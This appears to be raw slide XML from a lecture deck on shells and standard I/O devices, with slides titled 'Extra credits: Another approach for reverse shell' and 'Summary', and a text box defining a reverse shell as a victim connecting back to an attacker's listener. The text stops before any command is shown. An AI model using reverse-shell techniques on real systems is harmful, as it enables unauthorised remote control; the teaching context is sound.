                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId7"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="2184772" y="51677"/>
                  <a:ext cx="358560" cy="357120"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
              </p:spPr>
            </p:pic>
          </mc:Fallback>
        </mc:AlternateContent>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="18" name="Group 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3ADB0E17-734B-35F4-0483-1C8BF150F094}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3133732" y="273437"/>
            <a:ext cx="5042880" cy="1345320"/>
            <a:chOff x="3133732" y="273437"/>
            <a:chExt cx="5042880" cy="1345320"/>
          </a:xfrm>
        </p:grpSpPr>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CD55B8C8-DFC8-D328-CFE5-E0EF67763EAD}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3133732" y="273437"/>
                <a:ext cx="4656600" cy="1259280"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="8" name="Ink 7">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CD55B8C8-DFC8-D328-CFE5-E0EF67763EAD}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId9"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="3115732" y="255437"/>
                  <a:ext cx="4692240" cy="1294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0E44AA8-E4AB-D84B-6D7C-19B58426C5FD}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7675492" y="1320677"/>
                <a:ext cx="162360" cy="298080"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="9" name="Ink 8">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{30E44AA8-E4AB-D84B-6D7C-19B58426C5FD}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId11"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="7657852" y="1302677"/>
                  <a:ext cx="19800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B55186A4-12A8-0F06-BD98-3C1C19E10B26}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7877452" y="892277"/>
                <a:ext cx="147600" cy="241560"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="16" name="Ink 15">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B55186A4-12A8-0F06-BD98-3C1C19E10B26}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId13"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="7859812" y="874277"/>
                  <a:ext cx="1832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8D4E8F2B-787C-FA74-48A6-FB09DCB8EB0E}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7727692" y="765557"/>
                <a:ext cx="448920" cy="477360"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="17" name="Ink 16">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8D4E8F2B-787C-FA74-48A6-FB09DCB8EB0E}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId15"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="7710052" y="747557"/>
                  <a:ext cx="484560" cy="513000"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
              </p:spPr>
            </p:pic>
          </mc:Fallback>
        </mc:AlternateContent>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="21" name="Group 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4E695CFF-1D2C-4273-1C31-6D7D48FECC1E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1822252" y="718757"/>
            <a:ext cx="5547600" cy="1025280"/>
            <a:chOff x="1822252" y="718757"/>
            <a:chExt cx="5547600" cy="1025280"/>
          </a:xfrm>
        </p:grpSpPr>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89453CD5-A27C-BEEA-1C3C-25033544C231}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="1894612" y="859157"/>
                <a:ext cx="5475240" cy="884880"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="19" name="Ink 18">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{89453CD5-A27C-BEEA-1C3C-25033544C231}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId17"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="1876972" y="841157"/>
                  <a:ext cx="5510880" cy="920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9F38F2D8-6546-53E9-AA19-8B251B406328}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="1822252" y="718757"/>
                <a:ext cx="123840" cy="248400"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="20" name="Ink 19">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9F38F2D8-6546-53E9-AA19-8B251B406328}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId19"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="1804252" y="700757"/>
                  <a:ext cx="159480" cy="284040"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
              </p:spPr>
            </p:pic>
          </mc:Fallback>
        </mc:AlternateContent>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="24" name="Group 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{760F4072-955C-7D20-F667-223D0A0BB030}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2609572" y="577637"/>
            <a:ext cx="322200" cy="517680"/>
            <a:chOff x="2609572" y="577637"/>
            <a:chExt cx="322200" cy="517680"/>
          </a:xfrm>
        </p:grpSpPr>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8975A4BB-7325-6AFE-302E-B6E9D7FF22F8}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="2719372" y="758717"/>
                <a:ext cx="158760" cy="268200"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="22" name="Ink 21">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8975A4BB-7325-6AFE-302E-B6E9D7FF22F8}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId21"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="2701732" y="741077"/>
                  <a:ext cx="1944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390D2FF0-33B9-0789-38EE-9B33CFC3C6EC}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="2609572" y="577637"/>
                <a:ext cx="322200" cy="517680"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="23" name="Ink 22">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{390D2FF0-33B9-0789-38EE-9B33CFC3C6EC}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId23"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="2591932" y="559997"/>
                  <a:ext cx="357840" cy="55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827DF6C7-4049-53AB-E939-22D611165851}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="11503732" y="3296357"/>
              <a:ext cx="360" cy="1800"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="25" name="Ink 24">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{827DF6C7-4049-53AB-E939-22D611165851}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId25"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="11486092" y="3278717"/>
                <a:ext cx="36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3D27415F-F638-7958-0F63-39073B0D9045}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="11761852" y="3970277"/>
              <a:ext cx="360" cy="360"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="26" name="Ink 25">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3D27415F-F638-7958-0F63-39073B0D9045}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId27"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="11744212" y="395227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5C4485D2-763A-154F-9E32-3A29273361A0}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="11660332" y="4188797"/>
              <a:ext cx="360" cy="360"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="27" name="Ink 26">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5C4485D2-763A-154F-9E32-3A29273361A0}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId27"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="11642692" y="4170797"/>
                <a:ext cx="36000" cy="36000"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </mc:Fallback>
      </mc:AlternateContent>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="951356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Extra credits: Another approach for reverse shell</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{E24DD715-7292-4FAD-A484-09D5D92FAB07}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>27</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1819914"/>
            <a:ext cx="6971392" cy="4678170"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8249336" y="1"/>
            <a:ext cx="3942664" cy="235898"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="933" dirty="0"/>
              <a:t>https://stackoverflow.com/questions/35271850/what-is-a-reverse-shell</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{949834CC-EE51-45E6-AC16-55466089F92B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8339015" y="4704862"/>
            <a:ext cx="2122761" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>compare difference?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1385115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286933" y="609600"/>
            <a:ext cx="10197494" cy="1099457"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Summary</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="Isosceles Triangle 2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lide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9894532" y="6182876"/>
            <a:ext cx="683339" cy="365125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
            </a:pPr>
            <a:fld id="{E24DD715-7292-4FAD-A484-09D5D92FAB07}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:spcAft>
                  <a:spcPts val="600"/>
                </a:spcAft>
              </a:pPr>
              <a:t>28</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="Isosceles Triangle 2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Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B7A55E56-C113-9D37-1CCE-5F4557CBB0E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="182846513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843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vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Summary</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Isosceles Triangle 2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idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9894532" y="6182876"/>
            <a:ext cx="683339" cy="365125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
            </a:pPr>
            <a:fld id="{00000000-1234-1234-1234-123412341234}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:spcAft>
                  <a:spcPts val="600"/>
                </a:spcAft>
              </a:pPr>
              <a:t>29</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Isosceles Triangle 2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Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{504D91AE-24A6-F8B0-FE8E-4763B6E2E1B5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="334288225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37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Closeup of a keyboard">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B9E1CAAC-8F47-DF36-884F-032B06FEE9B4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:duotone>
              <a:prstClr val="black"/>
              <a:prstClr val="white"/>
            </a:duotone>
          </a:blip>
          <a:srcRect l="10103" r="23191" b="1"/>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4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="668866" y="1678666"/>
            <a:ext cx="5123515" cy="2369093"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400"/>
              <a:t>Standard input/output/error devices</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Subtitle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="677335" y="4050831"/>
            <a:ext cx="5113217" cy="1096901"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPct val="80000"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1600">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="50000"/>
                  <a:lumOff val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRP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16338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33502" y="609600"/>
            <a:ext cx="8596668" cy="1320800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Summary</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Isosceles Triangle 2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idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8590663" y="6041362"/>
            <a:ext cx="683339" cy="365125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
            </a:pPr>
            <a:fld id="{00000000-1234-1234-1234-123412341234}" type="slidenum">
              <a:rPr lang="en-US" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:pPr>
                <a:spcAft>
                  <a:spcPts val="600"/>
                </a:spcAft>
              </a:pPr>
              <a:t>30</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1333502" y="2160589"/>
            <a:ext cx="8596668" cy="3880773"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="93131" indent="0">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Wingdings 3" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3100"/>
              <a:t>Reverse Shell - attacker's machine acts as a server. It opens a communication channel on a port and waits for incoming connections. Victim's machine acts as a client and initiates a connection to the attacker's listening server. This is exactly what is done by the following:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="93131" indent="0">
              <a:spcBef>
